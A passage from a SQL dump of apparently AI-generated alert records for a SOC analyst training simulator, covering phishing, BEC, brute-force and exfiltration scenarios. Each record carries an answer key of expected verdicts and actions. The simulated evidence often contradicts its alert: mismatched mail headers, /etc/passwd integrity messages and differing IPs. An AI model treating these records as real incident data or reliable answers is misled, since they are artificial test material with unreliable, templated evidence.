4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1379, 'Phishing Email with QR Code Detected', 'medium', 'Proofpoint', 'A phishing email containing a QR code designed to redirect to a malicious site was detected.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T08:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"email_sender\":\"alert@securitybank.com\",\"username\":\"user@company.com\",\"url\":\"http://malicious-qrcode-site.com\"}', '2026-03-02 03:07:37', '2026-03-06 10:27:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alert@securitybank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email associated with phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-qrcode-site.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"QR code redirects to a phishing site\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The QR code links to a malicious site, confirming the phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with QR Code Detected\",\"date\":\"2026-03-02T13:55:06.903Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1380, 'BEC Attempt Detected with Spoofed Domain', 'critical', 'Elastic SIEM', 'A business email compromise attempt detected with a spoofed domain, targeting financial transactions.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T15:20:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.70\",\"email_sender\":\"ceo@legitimatecompany.com\",\"domain\":\"legitimatecompany.com\",\"username\":\"finance@company.com\",\"url\":\"http://fake-invoice-page.com\"}', '2026-03-02 03:07:37', '2026-03-07 10:42:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@legitimatecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain used in BEC attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fake-invoice-page.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL mimics legitimate site for credential theft\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Spoofed domain and phishing URL indicate a targeted BEC attempt.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1381, 'Suspicious File Downloaded from Public IP', 'low', 'Wazuh', 'A file download from a public IP was detected, flagged as suspicious.', 'Malware', 'T1203', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T12:05:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.95\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"user123\"}', '2026-03-02 03:07:37', '2026-03-07 11:46:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.95\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in suspicious download activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No detection by AV engines\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is clean, and download might stem from legitimate research.\"}', 'Novice', 'SIEM', 1, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1382, 'Credential Harvesting Attempt via Phishing Site', 'high', 'Azure Sentinel', 'A phishing site attempting credential harvesting was accessed by an internal user.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T14:10:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"203.0.113.85\",\"domain\":\"malicious-credentials.com\",\"username\":\"employee3\"}', '2026-03-02 03:07:37', '2026-03-09 02:42:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"malicious-credentials.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for credential phishing\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in phishing activities\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Access to a known phishing domain indicates an attempt to harvest credentials.\"}', 'Novice', 'SIEM', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1383, 'CEO Impersonation Phishing Email Detected', 'critical', 'Proofpoint', 'An email impersonating the CEO was detected, attempting to initiate unauthorized financial transactions.', 'Phishing', 'T1566', 1, 'investigating', 246, '{\"timestamp\":\"2026-03-02T13:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.120\",\"email_sender\":\"ceo@company-fake.com\",\"domain\":\"company-fake.com\",\"username\":\"finance@company.com\",\"url\":\"http://fake-payment-portal.com\"}', '2026-03-02 03:07:37', '2026-03-05 07:54:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@company-fake.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email used in CEO impersonation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fake-payment-portal.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL mimics payment portal for fraud\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Impersonation of CEO with fraudulent URL confirms a targeted phishing attack.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"CEO Impersonation Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.909Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1384, 'Unauthorized Admin Login Attempt', 'high', 'Splunk', 'Multiple unauthorized login attempts detected for an admin account from a foreign IP.', 'Brute Force', 'T1110', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T17:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.200\",\"username\":\"admin\",\"hostname\":\"secure-server01\",\"failed_attempts\":\"50\"}', '2026-03-02 03:07:37', '2026-03-09 02:35:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for multiple unauthorized login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"High-privilege internal account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Frequent failed logins from a malicious IP suggest a brute force attempt.\"}', 'Novice', 'SIEM', 1, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1385, 'Data Exfiltration Attempt via Suspicious Domain', 'critical', 'Wazuh', 'Data exfiltration attempt detected via a connection to a suspicious domain.', 'Data Exfil', 'T1048', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T18:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"203.0.113.175\",\"domain\":\"exfiltration-domain.com\",\"username\":\"dataadmin\"}', '2026-03-02 03:07:37', '2026-03-07 10:44:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"exfiltration-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain known for data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.175\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP used in data exfiltration activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Connection to a known exfiltration domain indicates a data breach attempt.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1386, 'False Positive: Routine Internal Network Scan', 'low', 'Elastic SIEM', 'Detected a series of network connections which appear to be a routine internal scan.', 'Lateral Movement', 'T1021', 0, 'Closed', 233, '{\"timestamp\":\"2026-03-02T09:25:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.1\",\"dst_ip\":\"10.1.1.10\",\"username\":\"networkscanner\",\"hostname\":\"scanner-host\"}', '2026-03-02 03:07:37', '2026-03-03 12:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP for network scanning tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network device\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity matches the pattern of a scheduled internal network scan.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 